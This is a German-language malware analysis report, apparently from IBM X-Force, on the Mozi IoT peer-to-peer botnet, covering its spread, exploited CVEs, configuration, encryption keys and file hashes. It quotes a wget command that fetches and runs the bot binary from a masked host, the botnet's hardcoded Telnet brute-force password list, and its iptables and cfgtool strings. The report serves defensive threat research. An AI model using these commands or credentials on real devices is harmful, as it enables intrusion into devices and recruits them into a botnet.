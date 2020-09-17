IBM X-Force hat festgestellt, dass das Mozi-Botnetz, ein relativ neuer Akteur im Bereich der Bedrohungen, bei Geräten des Internets der Dinge (IoT) vermehrt auftritt.
Diese Malware ist seit Ende 2019 aktiv und weist Code-Überschneidungen mit Mirai und seinen Varianten auf. Mozi machte von Oktober 2019 bis Juni 2020 fast 90 % des beobachteten IoT-Netzwerkverkehrs aus.
Diese bemerkenswerte Übernahme ging mit einem enormen Anstieg der gesamten IoT-Botnetz-Aktivitäten einher, was darauf hindeutet, dass Mozi seine Konkurrenten nicht vom Markt verdrängt hat. Vielmehr hat es den Markt überschwemmt und die Aktivitäten anderer Varianten in den Schatten gestellt. Insgesamt sind die kombinierten IoT-Angriffsfälle von Oktober 2019, als die Angriffe deutlich zunahmen, bis Juni 2020 um 400 % höher als die kombinierten IoT-Angriffsfälle der beiden vorangegangenen Jahre.
Dieser Anstieg von IoT-Angriffen könnte verschiedene Ursachen haben, ist jedoch möglicherweise zum Teil auf die stetig wachsende IoT-Landschaft zurückzuführen, die für Angreifer immer attraktiver wird. Weltweit sind etwa 31 Milliarden IoT-Geräte im Einsatz, und die IoT-Bereitstellungsrate liegt derzeit bei 127 Geräten pro Sekunde.
Angreifer nutzen diese Geräte bereits seit einiger Zeit, insbesondere über das Mirai-Botnetz. Das IBM X-Force Incident Response and Intelligence Services (IRIS)-Team beobachtet diese Entwicklung seit fast vier Jahren. Warum also dieser plötzliche Anstieg? Untersuchungen von IBM deuten darauf hin, dass Mozi weiterhin vor allem durch den Einsatz von Command-Injection-Angriffen (CMDi) erfolgreich ist, die häufig auf Fehlkonfigurationen von IoT-Geräten zurückzuführen sind. Das anhaltende Wachstum der IoT-Nutzung und unzureichende Konfigurationsprotokolle sind wahrscheinlich die Ursachen für diesen Anstieg. Dieser Anstieg könnte durch den aufgrund von COVID-19 häufigeren Fernzugriff auf Unternehmensnetzwerke noch verstärkt worden sein.
Ein IoT-Botnetz kann dazu verwendet werden, verteilte Denial-of-Service-Angriffe (DDoS) durchzuführen, Daten zu stehlen und Spam zu versenden. Es gibt eine Vielzahl unterschiedlicher Typen von IoT-Geräten, die ausgenutzt werden können:
Diese große Angriffsfläche macht Unternehmen anfällig für IoT-Botnets. Hinzu kommen die Sicherheitslücken, die diese Geräte häufig bereits im Auslieferungszustand aufweisen, sowie unzureichende Sicherheitsmaßnahmen bei der Bereitstellung. Die bemerkenswerteste Schwachstelle im IoT sind CMDi-Angriffe.
Nahezu alle von IBM beobachteten IoT-Targeting-Angriffe versuchten, mithilfe von CMDi-Angriffen einen ersten Zugriff auf das Gerät zu erlangen. Wenn das Zielgerät ein IoT-Gerät war und anfällig für diese Angriffe war, wurde die Nutzlast heruntergeladen und ausgeführt.
CMDi-Angriffe sind aus mehreren Gründen bei IoT-Geräten äußerst beliebt. Erstens enthalten eingebettete IoT-Systeme häufig eine Webschnittstelle und eine Debugging-Schnittstelle, die aus der Firmware-Entwicklung übrig geblieben sind und ausgenutzt werden können. Zweitens können in IoT-Webschnittstellen integrierte PHP-Module ausgenutzt werden, um böswilligen Akteuren die Möglichkeit zur Remote-Ausführung zu geben. Und drittens sind IoT-Schnittstellen nach ihrer Bereitstellung oft anfällig, da Administratoren es versäumen, die Schnittstellen durch Bereinigung erwarteter Remote-Eingaben zu sichern. Dadurch können Bedrohungsakteure Shell-Befehle wie „wget“ eingeben.
Unsere Analyse ergab, dass das Mozi-Botnetz CMDi nutzt, indem es einen „wget“-Shell-Befehl verwendet und anschließend die Berechtigungen ändert, um dem Angreifer die Interaktion mit dem betroffenen System zu ermöglichen. Einige Beispiele:
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
Wenn der Host für CMDi anfällig war, würde dieser Befehl eine Datei namens „mozi.a“ herunterladen und ausführen. Unsere Analyse dieses speziellen Beispiels zeigt, dass die Datei auf einer Mikroprozessorarchitektur ohne verriegelte Pipeline-Stufen (MIPS) ausgeführt wird. Das ist eine Erweiterung, die von Maschinen mit reduzierter Befehlssatzarchitektur (RISC) verstanden wird, die auf vielen IoT-Geräten weit verbreitet ist. Sobald der Angreifer über das Botnetz vollständigen Zugriff auf das Gerät erlangt hat, kann die Firmware-Ebene geändert und zusätzliche Malware auf dem Gerät installiert werden.
Obwohl dieses Beispiel einen bekannten Vektor zitiert, kann es aus zwei Hauptgründen weiterhin wirksam sein. Erstens ermöglichen neue Schwachstellen eine ständige Aktualisierung der Ausbeutungsversuche über CMDi, und eine langsame Patch-Implementierung kann ausgenutzt werden. Zweitens lässt sich diese Aktivität leicht automatisieren, sodass Bedrohungsakteure schnell und kostengünstig eine große Anzahl von Geräten angreifen können.
Die Infrastruktur der Mozi-Bot-Infrakstruktur scheint hauptsächlich aus China zu stammen und macht 84 % der beobachteten Infrastruktur aus. Diese Tatsache deckt sich mit anderen Open-Source-Untersuchungen zu IoT-Aktivitäten im Jahr 2020.
Nachfolgend eine Liste der Schwachstellen, die IBM beim Mozi-Botnetz beobachtet hat und die dieses auszunutzen versucht:
|Sicherheitslücke
|Betroffenes Gerät
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|GPON-Router
|CVE-2014-8361
|Geräte, die das Realtek SDK verwenden
|Eir D1000 Wireless Router RCI
|Eir D1000 Wireless Router
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi unauthentifizierter RCE
|Netgear DGN1000
|MVPower DVR Befehlsausführung
|MVPower DVR TV-7104HE
|CVE-2015-2051
|D-Link Geräte
|D-Link UPnP SOAP-Befehlsausführung
|D-Link Geräte
|CCTV-DVR-Anbieter RCE
|Mehrere CCTV-DVR-Anbieter
Das Mozi-Botnetz ist ein Peer-to-Peer-Botnetz (P2P), das auf dem DSHT-Protokoll (Distributed Sloppy Hash Table) basiert und sich über Schwachstellen in IoT-Geräten und schwache Telnet-Passwörter verbreiten kann.
Bei der Ausführung versucht das Mozi-Botnetz, den lokalen UDP-Port 14737 zu binden. Das Beispiel liest /proc/net/tcp oder /proc/net/raw, um Prozesse zu finden und zu beenden, die die Ports 1536 und 5888 verwenden. Das Beispiel überprüft, ob die Datei /usr/bin/python vorhanden ist. Wenn dies der Fall ist, ändert das Beispiel seinen Prozessnamen in sshd. Andernfalls ändert das Beispiel ihn in dropbear.
Das Mozi-Botnetz weist bekanntermaßen mindestens zwei einzigartige Merkmale auf. Es verwendet ECDSA384 (Elliptic Curve Digital Signature Algorithm 384) zur Überprüfung seiner Integrität. Darüber hinaus verwendet es Teile des Gafgyt-Codes wieder.
Es enthält fest codierte öffentliche DHT-Knoten, die zum Beitritt zum P2P-Netzwerk verwendet werden können. Diese Knoten sind:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Das Mozi-Botnetz verfügt über vier Hauptfunktionen. Es kann DDoS-Angriffe (HTTP, TCP, UDP) durchführen, Befehlsausführungsangriffe ausführen, schädliche Payloads von bestimmten URLs herunterladen und ausführen sowie Bot-Informationen sammeln.
Die folgende Tabelle enthält allgemeine Informationen zu den analysierten Dateien. Die Details umfassen sowohl übermittelte Dateien als auch Restdateien. (Restdateien sind Dateien, die während der Malware-Analyse statisch oder dynamisch extrahiert werden.) Die Daten umfassen den Dateinamen, die durch die Analyse ermittelte Dateikategorie, den Datei-Hash und die Datei-Verwandtschaft in Bezug auf die anderen Dateien in der Tabelle.
|Dateiname
|Dateikategorie
|Datei-Hash
|Übergeordnet
|Mozi.m
|Botnetz
|4dde761681684d7edad4e5e1ffdb940b
|Nicht zutreffend
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Botnetz
|86d42d968d3d12c36722e16c78e49ffb
|Mozi.m
|Mozi.a
|Botnetz
|9a111588a7db15b796421bd13a949cd4
|Nicht zutreffend
|83441d77abb6cf328e77e372dc17c607fb9c4a26172ae80d83708ae3865053d
|Botnetz
|dd4B6f3216709e193ed9f06c37bcc3890
|Mozi.a
Bei der Ausführung versucht die Probe, sich an den lokalen UDP-Port 14737 zu binden. Das Beispiel liest /proc/net/tcp oder /proc/net/raw, um Prozesse zu finden und zu beenden, die die Ports 1536 und 5888 verwenden. Die Beispiel überprüft, ob die Datei /usr/bin/python vorhanden ist. Wenn dies der Fall ist, ändert das Beispiel seinen Prozessnamen in sshd. Andernfalls ändert das Beispiel ihn zu dropbear:
Das Beispiel versucht außerdem, die Zugriffskontrollliste zu aktualisieren, um SSH und Telnet zu blockieren und zu verhindern, dass andere Botnets diese nutzen.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
Außerdem wählt es zufällig fest codierte Ports in der iptable aus:
Das Mozi-Botnetz nutzt ein angepasstes DHT-Protokoll, um sein P2P-Netzwerk aufzubauen. Der Prozess, wie ein neuer Mozi-Knoten dem DHT-Netzwerk beitritt, ist wie folgt:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Das Beispiel muss eine ID für den aktuellen Knoten generieren. Laut einem 360 Netlab-Bericht über Mozi ist die „ID 20 Byte lang und besteht aus dem Präfix 888888, das in die Probe eingebettet ist, oder dem Präfix, das in der Konfigurationsdatei [hp] angegeben ist, sowie einer zufällig generierten Zeichenfolge.“ Die Konfigurationsdatei ist unten dargestellt:.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Um sich mit dem DHT-Netzwerk zu verbinden, sendet die Probe eine Ping-Abfrage an diese fest codierten öffentlichen DHT-Knoten. Die Ping-Abfrage mit der Knoten-ID wird im Datenverkehr in der folgenden Wireshark-Abbildung dargestellt.
Beide Beispiele werden mit einem maßgeschneiderten UPX-Packer verpackt. Dieser setzt die Werte von p_file_size und p_blocksize in der p_info-Struktur auf Null zurück.
Das Beispiel enthält eine fest codierte Konfigurationsdatei, die unten dargestellt ist:
Sie besteht aus vier Abschnitten:
Die Konfigurationsdaten werden mit einem fest codierten XOR-Schlüssel verschlüsselt: 4E665A8F80C8AC238DAC4706D54F6F7E. Die entschlüsselten Konfigurationsdaten sind nachfolgend aufgeführt:
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Die Konfigurationsdaten unterstützen mehrere Befehle, die wie folgt gekennzeichnet sind:
|Tag (Befehl)
|Beschreibung
|[ss]
|Bot-Rolle
|[ssx]
|Tag aktivieren/deaktivieren [ss]
|[CPU]
|CPU-Architektur
|[cpux]
|Tag aktivieren/deaktivieren [CPU]
|[nd]
|neuer DHT-Knoten
|[hp]
|DHT-Knoten-Hash-Präfix
|[ATK]
|DDoS-Angriffstyp
|[ver]
|Wert im V-Abschnitt in DHT-Protcol
|[sv]
|Konfiguration aktualisieren
|[ud]
|Bot aktualisieren
|[dr]
|Laden Sie die Payload von der angegebenen URL herunter und führen Sie sie aus
|[rn]
|Spezifizierten Befehl ausführen
|[dip]
|ip:port zum Herunterladen des Mozi-Bot
|[idp]
|Bot melden
|[count]
|URL, über die der Bot gemeldet wurde
Das Mozi-Botnetz verwendet Teile des Gafgyt-Codes für DDoS-Angriffe. Es unterstützt mehrere Typen von DDoS-Angriffen, darunter HTTP, TCP und UDP.
ECDSA384-Signatur 1 wird verwendet, um den Hashwert der Konfigurationsdaten zu überprüfen. Der fest codierte öffentliche Schlüssel, der zur Überprüfung verwendet wird, lautet:
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
Es ist mit dem XOR-Schlüssel 4E665A8F80C8AC238DAC4706D54F6F7E verschlüsselt. Der dekodierte öffentliche Schlüssel ist:
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
Die Konfigurationsversion bestimmt, wann der Bot aktualisiert werden soll. Der Bot wird aktualisiert, wenn dieser Wert größer als sein aktueller Wert ist.Die ECDSA384-Signatur 2 wird verwendet, um die ersten drei Teile der Konfigurationsdatei zu überprüfen. Der fest codierte öffentliche Schlüssel, der zur Überprüfung verwendet wird, lautet:
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
Es ist mit dem XOR-Schlüssel 4E665A8F80C8AC238DAC4706D54F6F7E verschlüsselt. Der dekodierte öffentliche Schlüssel ist:
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
Zusätzlich zu den Schwachstellen, die das Mozi-Botnetz ausnutzt, um Zugriff auf das Gerät des Opfers zu erlangen, kann das Mozi-Botnetz auch Telnet-Anmeldedaten mithilfe einer fest programmierten Liste von Anmeldedaten mit Brute-Force-Angriffen knacken:
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
Eine von dem Beispiel verwendete Brute-Force-Methode für die Telnet-Anmeldung ist wie folgt:
Mozi.m und Mozi.a
Netzwerk
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Deutliche Strings (entpackt)
8.8.8.8 /proc/net/route Mozilla/4.0 (Kompatibel; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0 (kompatibel; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0 (kompatibel mit: MSIE 8.0, Windows NT 5.1, pl) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (kompatibel; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 wie Mac OS X) AppleWebKit/600.1.4 (KHTML, wie Gecko) Version/8.0 mobil/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, wie Gecko) Version/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, wie Gecko) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) wie Gecko Mozilla/4.0 (kompatibel; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, wie Gecko) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/50.0.2661.89 Mobil Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, wie Gecko) Version/4.0 Chrome/33.0.0.0 Mobil Safari/537.36 Mozilla/4.0 (kompatibel mit: MSIE 8.0, X11, Linux x86_64, pl) Opera 11.00 Mozilla/4.0 (kompatibel; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US) Mozilla/4.0 (kompatibel; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] Dieser Knoten akzeptiert keine Ankündigungen dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
Die IoT-Botnet-Landschaft unterliegt einem ständigen Wandel, und die Daten von IBM Security deuten darauf hin, dass Bedrohungsakteure in diesem Bereich weiterhin aktiv sind. Da neuere Botnet-Gruppen wie Mozi ihre Aktivitäten ausweiten und die IoT-Aktivitäten insgesamt zunehmen, müssen Unternehmen, die IoT-Geräte einsetzen, sich der sich entwickelnden Bedrohung bewusst sein. IBM beobachtet zunehmend, dass IoT-Geräte von Unternehmen zum Ziel von Angreifern werden. Command Injection bleibt der bevorzugte Infektionsvektor für Angreifer, was erneut verdeutlicht, wie wichtig es ist, die Standardeinstellungen von Geräten zu ändern und effektive Penetrationstests durchzuführen, um Schwachstellen zu finden und zu beheben.
Mozi.m Metadata
|Dateiname:
|Mozi.m
|Dateigröße:
|108,808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|Dateityp:
|ELF 32-Bit-MSB-ausführbare Datei, MIPS, MIPS-I Version 1 (SYSV), statisch verknüpft, gestrippt
|Kategorie:
|Botnetz
|IRIS-Name:
|Mozi
|Weitere Namen:
Mozia. Metadaten
|Dateiname:
|Mozi.a
|Dateigröße:
|95,268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|Dateityp:
|ELF 32-Bit-LSB-ausführbare Datei, ARM, Version 1, statisch verknüpft, gestrippt
|Kategorie:
|Botnetz
|IRIS-Name:
|Mozi
|Weitere Namen:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadaten
|Dateiname:
|d546_unpacked
|Dateigröße:
|266,108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Dateityp:
|ELF 32-Bit-MSB-ausführbare Datei, MIPS, MIPS-I Version 1 (SYSV), statisch verknüpft, gestrippt
|Kategorie:
|Botnetz
|IRIS-Name:
|Mozi
|Weitere Namen:
83441d77abb6cf328e77e372dc17c607fb9c4a26172ae80d83708ae3865053d Metadaten
|Dateiname:
|83441d77abb6cf328e77e372dc17c607fb9c4a26172ae80d83708ae3865053d
|Dateigröße:
|212,464
|MD5:
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a26172ae80d83708ae3865053d
|Dateityp:
|b’ELF 32-Bit-LSB-ausführbare Datei, ARM, Version 1, statisch verknüpft, gestrippt
|Kategorie:
|Botnetz
|IRIS-Name:
|Mozi
|Weitere Namen: